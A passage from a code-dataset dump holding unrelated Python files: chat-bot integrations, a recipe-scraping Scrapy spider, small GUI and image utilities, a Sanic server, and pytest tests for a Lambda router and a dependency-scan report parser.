    \", \"\\n\")\n content = re.sub(r'<\\/?i>', '_', content)\n content = re.sub(r'<\\/?strike>', '~', content)\n content = re.sub('<(a|br|div|p)>', '', content)\n content = content.replace(\"«_\", \"_«\")\n content = content.replace(\"_»\", \"»_\")\n content = content.replace(\"«*\", \"*«\")\n content = content.replace(\"*»\", \"»*\")\n content = content.replace(\" ** \", \" \")\n content = content.replace(\"\\n**\", \" \")\n content = content.replace(\"*\\n*\", \"\\n\")\n return content+\"\\n\"\n\n async def _convert_quote(self, item):\n logger.debug(\"CONVERTING QUOTE\")\n meta = item[\"item\"][\"meta\"]\n content = \">*{}*\\n\".format(meta.get(\"quote\",\"\").replace(\"\\n\", \" \"))\n if meta.get(\"credit\"):\n content += \"> • _{}_\\n\\n\".format(meta.get(\"credit\", \"\"))\n return content\n\n async def _convert_image(self, item):\n logger.debug(\"CONVERTING IMAGE\")\n content = \"\"\n tmp_path = None\n try:\n # handle image\n image_data = item[\"item\"][\"meta\"][\"media\"][\"renditions\"][\"viewImage\"]\n if image_data.get(\"href\"):\n content += \"\\n{}\\n\".format(image_data[\"href\"])\n # handle text\n caption = item[\"item\"][\"meta\"][\"caption\"]\n if caption:\n content += \"\\n{} \".format(caption)\n credit = item[\"item\"][\"meta\"][\"credit\"]\n if credit:\n content += \" _({})_ \".format(credit)\n else:\n # assure at last a whitespace!\n content += \" \"\n except Exception as e:\n logger.error(\"SLACK: Fatal error when converting image.\")\n logger.exception(e)\n return content, tmp_path\n\n async def _convert_embed(self, item):\n logger.debug(\"CONVERTING EMBED\")\n content = \"\"\n meta = item[\"item\"][\"meta\"]\n if meta.get(\"original_url\"):\n if meta.get(\"html\", \"\").find('class=\"twitter-tweet\"') > -1 or \\\n meta[\"original_url\"].find(\"youtube\") > -1:\n content = \"\\n{}\\n\".format(meta[\"original_url\"])\n return content\n\n async def convert(self, post):\n content = \"\"\n images = []\n try:\n for g in post.get(\"groups\", []):\n if g[\"id\"] != \"main\":\n continue\n\n for item in g[\"refs\"]:\n if item[\"item\"][\"item_type\"] == \"text\":\n content += await self._convert_text(item)\n elif item[\"item\"][\"item_type\"] == \"quote\":\n content += await self._convert_quote(item)\n elif item[\"item\"][\"item_type\"] == \"image\":\n img_text, _ = await self._convert_image(item)\n content += img_text\n elif item[\"item\"][\"item_type\"] == \"embed\":\n content += await self._convert_embed(item)\n except Exception as e:\n logger.error(\"Converting to slack post failed.\")\n logger.exception(e)\n return ConversionResult(content=content)\n","sub_path":"livebridge_slack/converters/liveblog_slack.py","file_name":"liveblog_slack.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"61535721","text":"from discord.ext import commands\nfrom geopy.geocoders import Nominatim\nimport aiohttp\nimport os\n\n\nclass Weather(commands.Cog):\n def __init__(self, client, api_key):\n self.client = client\n self.user_agent = \"nano-bot\"\n self.api_host = \"https://api.openweathermap.org/data/2.5/onecall\"\n self.api_key = api_key\n\n @commands.command(name=\"weather\")\n async def weather(self, ctx, location=\"Cleveland\", unit=\"c\"):\n \"\"\"\n Gets weather for given location & unit (default is Cleveland & Celsius).\n \"\"\"\n geolocator = Nominatim(user_agent=self.user_agent)\n loc = geolocator.geocode(location)\n\n if unit == \"c\":\n measurement_unit = \"metric\"\n elif unit 
== \"f\":\n measurement_unit = \"imperial\"\n elif unit == \"k\":\n measurement_unit = \"standard\"\n\n endpoint = f\"{self.api_host}?lat={loc.latitude}&lon={loc.longitude}&appid={self.api_key}&units={measurement_unit}\"\n session = aiohttp.ClientSession()\n response = await session.get(endpoint)\n data = await response.json()\n await session.close()\n\n if data.get('error'):\n return await ctx.send(f\"Could not fetch info. Reason: {data['error']}\")\n\n current = f\"{data['current']['weather'][0]['main']}, {data['current']['temp']}º{unit.upper()} (feels like {data['current']['feels_like']}º{unit.upper()}).\"\n\n message = f\"{current}\"\n await ctx.send(message)\n\n\ndef setup(client):\n if os.environ.get('RUNNING_DOCKER_COMPOSE'):\n key_file_path = os.environ.get(\"OPENWEATHERMAP_KEY\")\n with open(key_file_path, 'r') as key_file:\n API_KEY = key_file.read()\n else:\n API_KEY = os.environ.get(\"OPENWEATHERMAP_KEY\")\n\n client.add_cog(Weather(client, API_KEY))\n","sub_path":"nano/cogs/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"185752087","text":"import kivy\nfrom kivy.app import App\nfrom kivy.logger import Logger\nfrom kivy.clock import Clock\n\n\nfrom kivy.uix.image import Image, AsyncImage\n\nfrom scene_classifier import scene_classifier\n\nimport math, random\n\n\n################################################### \nclass Background_Image( Image ):\n\n anim_delay = 0.1\n keep_data = True\n\n update_always = True\n \n def __init__( self, **kwargs):\n Logger.trace('Background Image widget building')\n super(Background_Image,self).__init__(**kwargs)\n self.allow_stretch = True\n self.img_idx = 0\n\n self.precip = ''\n self.sun = ''\n self.season = ''\n\n config = App.get_running_app().config\n self.resource_path = config.get('Background_Image', 'backgrounds')\n self.default_file = config.get('Background_Image', 'default_bg') \n self.source = self.resource_path + '\\\\' + self.default_file\n\n self.scene_parser = scene_classifier( config.get('Background_Image', 'base_path') + '\\\\' + config.get('Background_Image', 'config_file') )\n self.scene_parser.debug = False\n\n self.update_image()\n\n try:\n update_time = config.getint('Background_Image', 'update_interval')\n except:\n \n Logger.warning(\"[Background Image] invalid update time....defaulting to 30 minutes\")\n update_time = 1800\n \n Clock.schedule_interval( self.update_image, update_time )\n\n def _image_loaded(self, proxyImage):\n if proxyImage.image.texture:\n self.texture = proxyImage.image.texture\n\n def parse_current_state( self ):\n try:\n wx = App.get_running_app().weather_processor\n\n ### Current Precip\n conditions = wx.translate_conditions()\n precip = conditions['precip']\n\n ### Current Sunstate\n sun = wx.get_sun_state()\n\n ### current season\n season = wx.get_season()\n\n if self.update_always or not self.cond_same( precip, sun, season ):\n\n #Find the matching background\n files = self.scene_parser.find_scene( season = season, wx = precip, tod = sun )\n \n if len(files) == 0 and precip != 'none': files = self.scene_parser.find_scene( wx = self.precip, tod = self.sun )\n if len(files) == 0 : files = [ self.resource_path + '\\\\' + self.default_file ]\n\n self.precip = precip\n self.sun = sun\n self.season = season\n\n idx = random.randint(0, len(files)-1)\n \n return files[idx][0]\n except Exception as exp:\n Logger.error(\"[Background Image] Error parsing current weather. 
\" + exp.message )\n\n return None\n\n\n def cond_same( self, precip, sun, season ):\n return precip == self.precip and sun == self.sun and season == self.season\n \n \n\n def update_image(self, dt = None):\n bg_file = self.parse_current_state()\n \n if bg_file:\n Logger.trace(\"[Background Image] Updating Image: \" + bg_file )\n self.source = self.resource_path + '\\\\' + bg_file\n \n","sub_path":"background_widgets.py","file_name":"background_widgets.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"113773661","text":"'''\ncommand to run the crawler\nscrapy crawl nytcooking -o recipes.json -t json\n'''\n\n# -*- coding: utf-8 -*-\nimport scrapy\n\nfrom urllib.parse import urljoin\nfrom nyt_cooking.items import *\n\nclass NytcookingSpider(scrapy.Spider):\n name = \"nytcooking\"\n allowed_domains = [\"cooking.nytimes.com\"]\n start_urls = ['https://cooking.nytimes.com/search?q=&page=1']\n\n def parse(self, response):\n for p in range(1, 381): ##381 pages in the search # for testing, use range(1, 2)\n page = 'https://cooking.nytimes.com/search?q=&page='+ str(p)\n yield scrapy.Request(page, callback=self.parse_page)\n\n #parse links from one search page\n def parse_page(self, response):\n n = 0\n #extract links in the search page\n all_recipes_links = response.css(\"div.card-info-wrapper a::attr(href)\").extract()\n if_image = response.css('div.image-wrap a div.image img::attr(data-large)').extract() #retuen the links for recipe image\n \n for recipe in all_recipes_links:\n link = urljoin('https://cooking.nytimes.com/', recipe)\n #only parse recipe with a picture\n if \"pattern\" not in if_image[n]: # a recipe without a picture will has \"pattern\" in the image url\n yield scrapy.Request(link, callback=self.parse_recipe)\n n+=1\n\n \n def parse_recipe(self, response):\n r_obj = []\n r_obj = Recipes()\n r_obj['recipe_name'] = response.css('title::text').re('.+(?= Recipe - NYT Cooking)')[0]\n r_obj['num_ratings'] = response.xpath('//script').re('(?<=bootstrap.recipe.num_ratings = )[0-9]+')[0]\n r_obj['avg_ratings'] = response.xpath('//script').re('(?<=bootstrap.recipe.avg_rating = )[0-9]+')[0]\n r_obj['author'] = response.xpath('//span[@class=\"byline-name\"]/text()').extract()[0]\n r_obj['time'] = response.xpath('//ul[@class=\"recipe-time-yield\"]/li/text()')[-1].re('.+')[0]\n r_obj['tags'] = response.css(\"div.tags-nutrition-container p a::text\").extract()\n r_obj['image_urls'] = response.xpath('//*[@id=\"content\"]/div[1]/div/article/div[1]/div[1]/img/@src').extract()\n r_obj['recipe_yield'] = response.xpath('//*[@id=\"content\"]/div[1]/div/article/header/div[2]/ul/li[1]/span[2]/text()').extract()\n #r_obj['nutrition_analysis'] = response.xpath('//*[@id=\"content\"]/div[1]/div/article/div[3]/section[1]/ul[2]/li/div/div[3]/ul/li/h5/text()').extract()\n \n r_obj['ingredients'] = []\n r_obj['nutrition_analysis'] = []\n r_obj['cooking_steps'] = []\n ## Easy to get xpath: right click on tag in chrome insection window!\n \n\n ###############################################\n #loop through all the nutrition contents\n ###############################################\n n_obj = []\n n = 0\n for x in response.xpath('//span[@itemprop=\"nutrition\"]'):\n n_obj.append(Nutritions())\n \n n_obj[n]['calories'] = x.xpath('span[@itemprop=\"calories\"]/text()').extract()\n n_obj[n]['fat'] = x.xpath('span[@itemprop=\"fatContent\"]/text()').extract()\n n_obj[n]['saturatedFat'] = 
x.xpath('span[@itemprop=\"saturatedFatContent\"]/text()').extract()\n n_obj[n]['transFat'] = x.xpath('span[@itemprop=\"transFatContent\"]/text()').extract()\n n_obj[n]['cabohydrates'] = x.xpath('span[@itemprop=\"carbohydrateContent\"]/text()').extract()\n n_obj[n]['fiber'] = x.xpath('span[@itemprop=\"fiberContent\"]/text()').extract()\n n_obj[n]['protein'] = x.xpath('span[@itemprop=\"proteinContent\"]/text()').extract()\n n_obj[n]['sodium'] = x.xpath('span[@itemprop=\"sodiumContent\"]/text()').extract()\n \n r_obj['nutrition_analysis'].append(dict(n_obj[n]))\n n += 1\n \n ##########################################\n #### cooking steps\n ##########################################\n s_obj = []\n n = 0\n for x in response.xpath('//*[@id=\"content\"]/div[1]/div/article/div[3]/section[2]/ol'):\n s_obj.append(Steps())\n \n s_obj[n]['step'] = x.xpath('.//li/text()').extract()\n r_obj['cooking_steps'].append(dict(s_obj[n]))\n n += 1\n \n #####################################\n #loop through all the ingredients\n #####################################\n i_obj=[]\n q_tmp=[]\n n=0\n for x in response.xpath('//li[@itemprop=\"recipeIngredient\"]'):\n i_obj.append(Ingredients())\n \n i_obj[n]['ingredient'] = x.xpath('span[@class=\"ingredient-name\"]/span/text()').extract()\n i_obj[n]['unit'] = x.xpath('span[@class=\"ingredient-name\"]/text()[1]').extract()\n q_tmp = x.xpath('span[@class=\"quantity\"]/text()').extract()\n if q_tmp==[]:\n q_tmp=[' ']\n i_obj[n]['quantity'] = q_tmp\n \n r_obj['ingredients'].append(dict(i_obj[n]))\n n += 1\n \n return (r_obj)\n\n\n######################################################################################\n################ End of the code ###################################################\n######################################################################################\n\n \n \n \n# u += x.xpath('span[@class=\"ingredient-name\"]/text()[1]').extract()\n# q_tmp = x.xpath('span[@class=\"quantity\"]/text()').extract()\n# if q_tmp==[]:\n# q_tmp=['0']\n# q += q_tmp\n# i += x.xpath('span[@class=\"ingredient-name\"]/span/text()').extract()\n \n \n #create an object\n \n\n# below is the quick way to output data\n\n'''\n yield {\n \n #extract title\n #'recipe_name': response.xpath('//h1[@class=\"recipe-title title name\"]/text()').extract(),\n 'recipe_name': response.css('title::text').re('.+(?= Recipe - NYT Cooking)')[0],\n \n #recipe number of ratings\n 'num_ratings': response.xpath('//script').re('(?<=bootstrap.recipe.num_ratings = )[0-9]+')[0],\n #(?<=foo) Lookbehind Asserts that what immediately precedes the current position in the string is foo\n \n #recipe average ratings\n 'avg_rating': response.xpath('//script').re('(?<=bootstrap.recipe.avg_rating = )[0-9]+')[0],\n \n 'quantity': q,\n \n 'unit': u,\n \n 'ingredients': i,\n \n #author\n 'author': response.xpath('//span[@class=\"byline-name\"]/text()').extract()[0],\n \n #time\n #'time': response.xpath('//ul[@class=\"recipe-time-yield\"]/li/text()').extract()[-1],\n 'time': response.xpath('//ul[@class=\"recipe-time-yield\"]/li/text()')[-1].re('.+')[0],\n \n #tags\n 'tags': response.css(\"div.tags-nutrition-container p a::text\").extract()\n #loop through ingredient list\n\n }\n'''\n \n'''\n # switch to using for loop to extract ingredients, units, and quantity\n #extract a list of ingredients\n 'ingredients': response.xpath('//span[@class=\"ingredient-name\"]/span/text()').extract(),\n #css method to extract ingredients\n #response.css(\"span.ingredient-name span::text\").extract()\n \n #extract quantity of 
the ingredient\n 'quantity': response.xpath('//span[@class=\"quantity\"]/text()').extract()\n #response.xpath('//li[@itemprop=\"recipeIngredient\"]//span[@class=\"quantity\"]/text()').extract()\n \n #ingredient quantity units, only select the 1st field of text\n 'unit': response.xpath('//span[@class=\"ingredient-name\"]/text()[1]').extract()\n'''\n\n\n\n \n #(?<=foo) (regExp) Lookbehind Asserts that what immediately precedes the current position in the string is foo\n #recipe number of ratings\n #num_ratings = response.xpath('//script').re('(?<=bootstrap.recipe.num_ratings = )[0-9]+')\n \n #recipe average ratings\n #avg_rating = response.xpath('//script').re('(?<=bootstrap.recipe.avg_rating = )[0-9]+')\n\n #extract a list of ingredients\n #ingredients = response.xpath('//span[@class=\"ingredient-name\"]/span/text()').extract()\n #css method to extract ingredients\n #response.css(\"span.ingredient-name span::text\").extract()\n\n #extract title\n #recipe_name = response.xpath('//h1[@class=\"recipe-title title name\"]/text()').extract()\n\n\n #author\n #author = response.xpath('//span[@class=\"byline-name\"]/text()').extract()\n\n #time\n #time = response.xpath('//ul[@class=\"recipe-time-yield\"]/li/text()').extract()[-1]\n\n","sub_path":"nyt_cooking/spiders/nytcooking.py","file_name":"nytcooking.py","file_ext":"py","file_size_in_byte":8899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"22819939","text":"class Cat():\n def __init__(self):\n self.name = \"\"\n self.age = 0\n\n def get_info(self):\n info = \"\"\n info += self.name + \", \"\n info += str(self.age)\n return info\n\ncats = []\n\ndef add_cat():\n new_cat = Cat()\n \n new_cat.name = name_entry.get()\n new_cat.age = int(age_entry.get())\n\n cats.append(new_cat)\n\n update_listbox()\n\ndef update_listbox():\n cat_listbox.delete(0, END)\n\n for cat in cats:\n cat_listbox.insert(END, cat.get_info())\n\ndef display_info():\n selected_indices = cat_listbox.curselection()\n\n if len(selected_indices) > 0:\n first_index = int(selected_indices[0])\n cat = cats[first_index]\n info_label[\"text\"] = cat.get_info()\n\n\n# build the GUI\nfrom tkinter import *\n\nroot = Tk()\n\n\n#instantiate the controls\nname_label = Label(root, text = \"Name\")\nname_entry = Entry(root)\n\nage_label = Label(root, text = \"Age\")\nage_entry = Entry(root)\n\nadd_cat_button = Button(root, text = \"Add Cat\", command = add_cat)\n\ncat_list_label = Label(root, text = \"Cats\")\ncat_listbox = Listbox(root)\n\ndisplay_cat_info_button = Button(root, text = \"Display Info\", command = display_info)\n\ninfo_label = Label(root, text = \" \")\n\n\n#placing controls by grid\nname_label.grid(row=0, column=0)\nname_entry.grid(row=1, column=0)\n\nage_label.grid(row = 2, column = 0)\nage_entry.grid(row = 3, column = 0)\n\nadd_cat_button.grid(row = 4, column = 0)\n\ncat_list_label.grid(row = 0, column = 1)\ncat_listbox.grid(row = 1, column = 1, rowspan = 3)\n\ndisplay_cat_info_button.grid(row = 4, column = 1)\n\ninfo_label.grid(row = 5, column = 0, columnspan = 2)\nroot.mainloop()\n","sub_path":"Python/catManager.py","file_name":"catManager.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"56020638","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport argparse\nimport numpy as np\nimport matplotlib as plt\n\nfrom PIL import (\n Image,\n ImageDraw,\n )\n\ndef main(argv=sys.argv[1:]):\n parser = argparse.ArgumentParser()\n parser.add_argument('image')\n parser.add_argument('-s', '--size', default=50, type=int)\n parser.add_argument('-o', '--output', default='var/images')\n args = parser.parse_args(argv)\n im = Image.open(args.image)\n height, width = im.size\n img_size = args.size\n img_size_half = int(img_size / 2)\n\n basename = os.path.basename(args.image)\n output_dir = os.path.join(args.output, basename)\n os.makedirs(output_dir, exist_ok=True)\n for yy in range(0, height-img_size, img_size_half):\n for xx in range(0, width-img_size, img_size_half):\n box = (yy, xx, yy+img_size, xx+img_size)\n image = im.crop(box)\n output_name = '{}-{}-{}-{}.jpg'.format(box[0], box[1], box[2], box[3])\n output_path = os.path.join(output_dir, output_name)\n image.save(output_path)\n # img = ImageDraw.Draw(im)\n print(args.image)\n\nif __name__ == '__main__':\n main()\n","sub_path":"watson_developper_cloud/cutter.py","file_name":"cutter.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"494486780","text":"from unittest.mock import Mock\n\nimport pytest\n\nfrom lambda_splitter.errors import HTTPAwareException\nfrom lambda_splitter.lambda_splitter import LambdaSplitter, LambdaTarget\n\nPATH_PARAMETER_KEY = 'path_parameter'\n\nRESPONSE_STATUS_CODE_FIELD = 'statusCode'\nRESPONSE_BODY_FIELD = 'body'\n\nDEFAULT_SUB_PATH = \"sub_path\"\nSUCCESS_MOCK = Mock(return_value={RESPONSE_STATUS_CODE_FIELD: 200})\n\n\ndef _generate_event(path_parameter: str, sub_path: str, body: str = None, method='GET') -> dict:\n return {\n 'httpMethod': method,\n 'pathParameters': {\n path_parameter: sub_path\n },\n 'body': body\n }\n\n\ndef setup_lambda_splitter(lambda_target: LambdaTarget) -> LambdaSplitter:\n lambda_splitter = LambdaSplitter(PATH_PARAMETER_KEY)\n lambda_splitter.add_sub_handler(DEFAULT_SUB_PATH, lambda_target)\n return lambda_splitter\n\n\n@pytest.fixture\ndef setup_lambda_splitter_with_method_handler():\n return_value = {RESPONSE_STATUS_CODE_FIELD: 200}\n mock_method = Mock(return_value=return_value)\n\n def handler_method(*args, **kwargs): return mock_method(*args, **kwargs)\n lambda_splitter = LambdaSplitter(PATH_PARAMETER_KEY)\n sub_path = 'sub_path'\n lambda_splitter.add_sub_handler(sub_path, LambdaTarget(handler_method))\n return lambda_splitter, mock_method, return_value, sub_path\n\n\n@pytest.fixture\ndef setup_embedded_lambda_splitter(setup_lambda_splitter_with_method_handler):\n lambda_splitter, mock_method, return_value, sub_path = setup_lambda_splitter_with_method_handler\n\n top_path_parameter_key = 'path_parameter_2'\n lambda_splitter_top = LambdaSplitter(top_path_parameter_key)\n top_sub_path = 'sub_path_2'\n lambda_splitter_top.add_sub_handler(top_sub_path, LambdaTarget(lambda_splitter))\n\n return lambda_splitter_top, top_sub_path, sub_path, top_path_parameter_key, return_value, mock_method\n\n\n@pytest.fixture\ndef setup_lambda_splitter_with_unsupported_handler():\n lambda_splitter = LambdaSplitter(PATH_PARAMETER_KEY)\n sub_path = 'sub_path'\n # noinspection PyTypeChecker\n lambda_splitter.add_sub_handler(sub_path, \"unsupported-handler\")\n\n return lambda_splitter, sub_path\n\n\n@pytest.fixture\ndef setup_lambda_splitter_with_json_handler():\n return_value = 
{RESPONSE_STATUS_CODE_FIELD: 200}\n mock_method = Mock(return_value=return_value)\n\n def handler_method(json): return mock_method(json=json)\n lambda_splitter = LambdaSplitter(PATH_PARAMETER_KEY)\n sub_path = 'sub_path'\n lambda_splitter.add_sub_handler(sub_path, LambdaTarget(handler_method))\n return lambda_splitter, mock_method, return_value, sub_path\n\n\n@pytest.fixture\ndef setup_lambda_splitter_with_method_handler_throws_http_aware_exception(request):\n mock_method = Mock(side_effect=request.param)\n\n def handler_method(): return mock_method()\n lambda_splitter = LambdaSplitter(PATH_PARAMETER_KEY)\n sub_path = 'sub_path'\n lambda_splitter.add_sub_handler(sub_path, LambdaTarget(handler_method))\n return lambda_splitter, mock_method, sub_path\n\n\ndef test_sanitise_path_leading_slash():\n some_path = '/hello/bye'\n\n sanitised_path = LambdaSplitter.sanitise_path(some_path)\n\n assert sanitised_path == 'hello/bye'\n\n\ndef test_sanitise_path_ending_slash():\n some_path = 'hello/bye/'\n\n sanitised_path = LambdaSplitter.sanitise_path(some_path)\n\n assert sanitised_path == 'hello/bye'\n\n\ndef test_sanitise_method():\n some_method = 'gEt'\n\n sanitised_method = LambdaSplitter.sanitise_method(some_method)\n\n assert sanitised_method == 'GET'\n\n\ndef test_call_when_handler_is_a_method(setup_lambda_splitter_with_method_handler):\n lambda_splitter, mock_method, return_value, sub_path = setup_lambda_splitter_with_method_handler\n\n result = lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, sub_path), {})\n\n mock_method.assert_called_once_with()\n assert result == return_value\n\n\ndef test_call_when_method_not_supported(setup_lambda_splitter_with_method_handler):\n lambda_splitter, mock_method, return_value, sub_path = setup_lambda_splitter_with_method_handler\n\n result = lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, sub_path, method='POST'), {})\n\n mock_method.assert_not_called()\n assert isinstance(result, dict)\n assert RESPONSE_STATUS_CODE_FIELD in result\n assert result[RESPONSE_STATUS_CODE_FIELD] == 405\n\n\ndef test_call_when_no_subpath_match(setup_lambda_splitter_with_method_handler):\n lambda_splitter, mock_method, return_value, sub_path = setup_lambda_splitter_with_method_handler\n\n result = lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, 'unknown_path'), {})\n\n mock_method.assert_not_called()\n\n assert RESPONSE_STATUS_CODE_FIELD in result\n assert result[RESPONSE_STATUS_CODE_FIELD] == 404\n assert RESPONSE_BODY_FIELD in result\n assert result[RESPONSE_BODY_FIELD] == \"{{\\\"error\\\": \\\"could not find path for this command, \" \\\n \"possible paths are [ {} ]\\\"}}\".format(sub_path)\n\n\ndef test_call_embedded_splitter(setup_embedded_lambda_splitter):\n lambda_splitter_top, top_sub_path, sub_path, top_path_parameter_key, return_value, mock_method = \\\n setup_embedded_lambda_splitter\n\n event = {\n 'httpMethod': 'GET',\n 'pathParameters': {\n top_path_parameter_key: top_sub_path,\n PATH_PARAMETER_KEY: sub_path\n },\n 'body': ''\n }\n\n result = lambda_splitter_top.__call__(event, {})\n\n mock_method.assert_called_once_with()\n assert result == return_value\n\n\ndef test_runtime_error_when_target_is_not_supported(setup_lambda_splitter_with_unsupported_handler):\n lambda_splitter, sub_path = setup_lambda_splitter_with_unsupported_handler\n with pytest.raises(RuntimeError):\n lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, sub_path), {})\n\n\ndef test_json_body(setup_lambda_splitter_with_json_handler):\n lambda_splitter, 
mock_method, _, sub_path = setup_lambda_splitter_with_json_handler\n\n result = lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, sub_path, '{\"some-field\": \"some-value\"}'), {})\n\n mock_method.assert_called_once_with(json={'some-field': 'some-value'})\n assert isinstance(result, dict)\n assert RESPONSE_STATUS_CODE_FIELD in result\n assert result[RESPONSE_STATUS_CODE_FIELD] == 200\n\n\ndef test_json_body_when_not_valid_json(setup_lambda_splitter_with_json_handler):\n lambda_splitter, mock_method, _, sub_path = setup_lambda_splitter_with_json_handler\n\n result = lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, sub_path, ''), {})\n\n mock_method.assert_not_called()\n assert isinstance(result, dict)\n assert RESPONSE_STATUS_CODE_FIELD in result\n assert result[RESPONSE_STATUS_CODE_FIELD] == 400\n assert RESPONSE_BODY_FIELD in result\n assert result[RESPONSE_BODY_FIELD] == '{\"error\": \"body must be a valid JSON\"}'\n\n\ndef test_json_body_when_unexpected_exception(setup_lambda_splitter_with_json_handler):\n lambda_splitter, mock_method, _, sub_path = setup_lambda_splitter_with_json_handler\n\n result = lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, sub_path, None), {})\n\n mock_method.assert_not_called()\n assert isinstance(result, dict)\n assert RESPONSE_STATUS_CODE_FIELD in result\n assert result[RESPONSE_STATUS_CODE_FIELD] == 400\n assert RESPONSE_BODY_FIELD in result\n assert result[RESPONSE_BODY_FIELD] == '{\"error\": \"error while trying to handle body\", \"exception\": \"the JSON ' \\\n 'object must be str, bytes or bytearray, not NoneType\"}'\n\n\n@pytest.mark.parametrize('setup_lambda_splitter_with_method_handler_throws_http_aware_exception',\n [HTTPAwareException(status_code=400, error_message='some error!')],\n ids=['400'],\n indirect=True)\ndef test_http_aware_exception(setup_lambda_splitter_with_method_handler_throws_http_aware_exception):\n lambda_splitter, mock_method, sub_path = setup_lambda_splitter_with_method_handler_throws_http_aware_exception\n\n result = lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, sub_path, None), {})\n\n mock_method.assert_called_once_with()\n assert isinstance(result, dict)\n assert RESPONSE_STATUS_CODE_FIELD in result\n assert result[RESPONSE_STATUS_CODE_FIELD] == 400\n assert RESPONSE_BODY_FIELD in result\n assert result[RESPONSE_BODY_FIELD] == '{\"error\": \"some error!\"}'\n\n\n@pytest.fixture\ndef lambda_splitter_with_failing_validation():\n validator_mock = Mock()\n validator_mock.validate.side_effect = RuntimeError(\"some validation error\")\n lambda_target = LambdaTarget(SUCCESS_MOCK, validators=[validator_mock])\n return setup_lambda_splitter(lambda_target)\n\n\ndef test_lambda_splitter_with_failing_validation(lambda_splitter_with_failing_validation):\n lambda_splitter = lambda_splitter_with_failing_validation\n\n with pytest.raises(RuntimeError):\n lambda_splitter.__call__(_generate_event(PATH_PARAMETER_KEY, DEFAULT_SUB_PATH, None), {})\n","sub_path":"tests/helpers/test_lambda_splitter.py","file_name":"test_lambda_splitter.py","file_ext":"py","file_size_in_byte":9058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"368823051","text":"from sanic import Sanic\nfrom sanic_cors import CORS, cross_origin\nfrom config import config\nimport controller\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom decorators import responds_to_options\n\napp = 
Sanic(__name__)\nCORS(app, origins=config['allowed_host_list'])\n\nengine = create_engine('sqlite:///app.db')\nDBSession = sessionmaker(bind=engine)\ndb_session = DBSession()\n\n\n@app.route('/', methods=['GET'])\nasync def heartbeat(request):\n return controller.get_heartbeat(request)\n\n\n@app.route('/slack-users', methods=['GET'])\nasync def slack_users(request):\n return controller.get_slack_users(request, db_session)\n\n@app.route('/verify-slack-email', methods=['POST', 'OPTIONS'])\n@responds_to_options()\nasync def verify_slack_email(request):\n return controller.post_verify_slack_email(request, db_session)\n\n\n@app.route('/authenticate-user', methods=['GET'])\nasync def authenticate_user(request):\n return controller.authenticate_user(request.json, db_session)\n\n\n@app.route(\"/users\", methods=[\"GET\"])\nasync def users(request):\n return controller.get_app_users(request.json, db_session)\n\n@app.route(\"/teams\", methods=[\"GET\"])\nasync def teams(request):\n return controller.get_teams(request.json, db_session)\n\n\n@app.route(\"/modify-user\", methods=[\"POST\", \"OPTIONS\"])\n@responds_to_options()\nasync def modify_user(request):\n return controller.modify_user(request.json, db_session)\n\n\n@app.route(\"/add-user\", methods=[\"POST\", \"OPTIONS\"])\n@responds_to_options()\nasync def add_user(request):\n return controller.add_user(request.json, db_session)\n\n\n@app.route(\"/add-team\", methods=[\"POST\", \"OPTIONS\"])\n@responds_to_options()\nasync def add_team(request):\n return controller.add_team(request.json, db_session)\n\n\n@app.route(\"/join-team\", methods=[\"POST\", \"OPTIONS\"])\n@responds_to_options()\nasync def join_team(request):\n return controller.join_team(request.json, db_session)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8000)\n","sub_path":"server/src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"478308704","text":"from django.test import TestCase\nfrom dojo.tools.gitlab_dep_scan.parser import GitlabDepScanParser\nfrom dojo.models import Test\n\n\nclass TestGitlabDepScanParser(TestCase):\n\n def test_parse_file_with_no_vuln_has_no_findings(self):\n testfile = open(\n \"dojo/unittests/scans/gitlab_dep_scan/gl-dependency-scanning-report-0-vuln.json\"\n )\n parser = GitlabDepScanParser()\n findings = parser.get_findings(testfile, Test())\n self.assertEqual(0, len(findings))\n\n def test_parse_file_with_one_vuln_has_one_finding(self):\n testfile = open(\n \"dojo/unittests/scans/gitlab_dep_scan/gl-dependency-scanning-report-1-vuln.json\"\n )\n parser = GitlabDepScanParser()\n findings = parser.get_findings(testfile, Test())\n self.assertEqual(1, len(findings))\n\n def test_parse_file_with_two_vuln_has_one_missing_component_(self):\n testfile = open(\n \"dojo/unittests/scans/gitlab_dep_scan/gl-dependency-scanning-report-2-vuln-missing-component.json\"\n )\n parser = GitlabDepScanParser()\n findings = parser.get_findings(testfile, Test())\n self.assertEqual(2, len(findings))\n finding = findings[0]\n self.assertEqual(None, finding.component_name)\n self.assertEqual(None, finding.component_version)\n finding = findings[1]\n self.assertEqual(\"golang.org/x/crypto\", finding.component_name)\n self.assertEqual(\"v0.0.0-20190308221718-c2843e01d9a2\", finding.component_version)\n\n def test_parse_file_with_multiple_vuln_has_multiple_findings(self):\n testfile = open(\n 
